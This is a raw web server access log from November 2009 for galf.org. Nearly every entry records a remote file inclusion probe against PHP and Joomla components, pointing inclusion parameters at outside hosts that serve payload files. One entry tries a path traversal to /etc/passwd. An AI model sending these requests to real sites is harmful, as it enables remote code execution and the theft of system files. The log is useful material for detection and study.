222.73.17.7 - - [09/Nov/2009:00:03:44 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:03:56 -0800] "GET /logs/access.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [09/Nov/2009:00:03:56 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [09/Nov/2009:00:03:56 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [09/Nov/2009:00:04:08 -0800] "GET /logs/access_090706.log/?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:04:27 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [09/Nov/2009:00:04:27 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.46.2.21 - - [09/Nov/2009:00:04:27 -0800] "GET /logs/access.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [09/Nov/2009:00:05:24 -0800] "GET /logs/access_090706.log/?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:05:24 -0800] "GET /?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:05:29 -0800] "GET /logs/access_090706.log/?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:05:29 -0800] "GET /?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:05:29 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:05:30 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
203.237.233.202 - - [09/Nov/2009:00:06:18 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.233.202 - - [09/Nov/2009:00:06:18 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.233.202 - - [09/Nov/2009:00:06:18 -0800] "GET /logs/access.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.229.252.11 - - [09/Nov/2009:00:06:33 -0800] "GET /logs/access_090504.log/error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:00:06:33 -0800] "GET /logs/error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:00:06:33 -0800] "GET /error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:06:41 -0800] "GET /logs/access.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:06:41 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:06:41 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:06:42 -0800] "GET /logs/access.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:06:42 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:06:42 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.229.252.11 - - [09/Nov/2009:00:07:37 -0800] "GET /logs/access_090504.log%20%20/error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.84.148.109 - - [09/Nov/2009:00:07:54 -0800] "GET /?footer=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
88.84.148.109 - - [09/Nov/2009:00:07:54 -0800] "GET /?footer=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:00:07:58 -0800] "GET /logs/access_090504.log%20%20/error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:00:07:58 -0800] "GET /error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:00:07:58 -0800] "GET /logs/error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:04 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:04 -0800] "GET /logs/access_090316.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:04 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:08:13 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:08:20 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:08:20 -0800] "GET /logs/access_090720.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:08:20 -0800] "GET /logs/access_090323.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:00:08:21 -0800] "GET /logs/access_090518.log%20%20/error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:08:26 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:27 -0800] "GET /logs/access_090525.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:08:28 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:08:32 -0800] "GET /logs/access_090720.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:08:32 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:08:32 -0800] "GET /logs/access_090323.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:32 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:34 -0800] "GET /logs/access_090504.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:08:34 -0800] "GET /logs/access_090720.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:08:34 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:08:35 -0800] "GET /logs/access_090323.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:36 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:36 -0800] "GET /logs/access_090720.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:36 -0800] "GET /logs/access_090323.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:00:08:43 -0800] "GET /logs/access_090518.log%20%20/error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:43 -0800] "GET /logs/access_090525.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:45 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:49 -0800] "GET /logs/access_090720.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:49 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:50 -0800] "GET /logs/access_090323.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:08:50 -0800] "GET /logs/access_090504.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://dk.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [09/Nov/2009:00:09:22 -0800] "GET /logs/access_090504.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:09:41 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:09:41 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:09:41 -0800] "GET /logs/access_091012.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.49 - - [09/Nov/2009:00:10:17 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:10:46 -0800] "GET /logs/access_090525.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [09/Nov/2009:00:10:59 -0800] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_log&_REQUEST[Itemid]=1&GLOBALS=&%20mosConfig_absolute_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [09/Nov/2009:00:10:59 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_log&_REQUEST[Itemid]=1&GLOBALS=&%20mosConfig_absolute_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [09/Nov/2009:00:11:01 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_log&_REQUEST[Itemid]=1&GLOBALS=&%20mosConfig_absolute_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:11:06 -0800] "GET /logs/access_090504.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:11:14 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:11:14 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:11:14 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:11:15 -0800] "GET /logs/access_090525.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:11:20 -0800] "GET /logs/access_090504.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:11:22 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:11:22 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:11:22 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:00:11:45 -0800] "GET /logs/access.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:00:11:46 -0800] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:00:11:46 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:00:12:11 -0800] "GET /logs/access.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:00:12:11 -0800] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:00:12:11 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
65.55.207.49 - - [09/Nov/2009:00:12:29 -0800] "GET /logs/access_090420.log HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:00:12:31 -0800] "GET /logs/access.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:00:12:31 -0800] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:00:12:31 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:00:12:44 -0800] "GET /logs/access_090504.log/error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:13:12 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:13:12 -0800] "GET /logs/access.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:13:12 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.123.212.188 - - [09/Nov/2009:00:13:26 -0800] "GET /logs/access_090511.log%20%20//include/admin.lib.inc.php?site_path=http://www.acumuladoresroverano.com/errors/401/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [09/Nov/2009:00:13:28 -0800] "GET /logs/access_091012.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_log&_REQUEST[Itemid]=1&GLOBALS=&%20mosConfig_absolute_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.124.127.164 - - [09/Nov/2009:00:13:29 -0800] "GET /logs/access.log//?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.229.252.11 - - [09/Nov/2009:00:13:40 -0800] "GET /logs/access_090518.log/error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.124.127.164 - - [09/Nov/2009:00:13:58 -0800] "GET /logs/access.log//?_PHPLIB[libdir]=http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.229.252.11 - - [09/Nov/2009:00:14:01 -0800] "GET /logs/access_090518.log/error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [09/Nov/2009:00:15:05 -0800] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://www.acumuladoresroverano.com/errors/401/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:15:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/3.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:15:07 -0800] "GET /logs/access_090622.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/3.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:15:07 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/3.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:15:41 -0800] "GET /logs/access_090622.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/3.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:15:41 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/3.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:15:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/3.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:16:39 -0800] "GET /logs/access_090921.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/3.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
66.229.252.11 - - [09/Nov/2009:00:16:58 -0800] "GET /logs/access_090511.log/error.php?dir=http://www.socialworkleadership.org/nsw/admin/reports/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:17:05 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:17:05 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:17:05 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:17:15 -0800] "GET /logs/access_090525.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [09/Nov/2009:00:17:46 -0800] "GET /logs/access_090921.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/3.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:18:11 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:18:11 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:18:11 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [09/Nov/2009:00:18:19 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_log&_REQUEST[Itemid]=1&GLOBALS=&%20mosConfig_absolute_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:00:20:01 -0800] "GET /logs/access_090921.log////skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
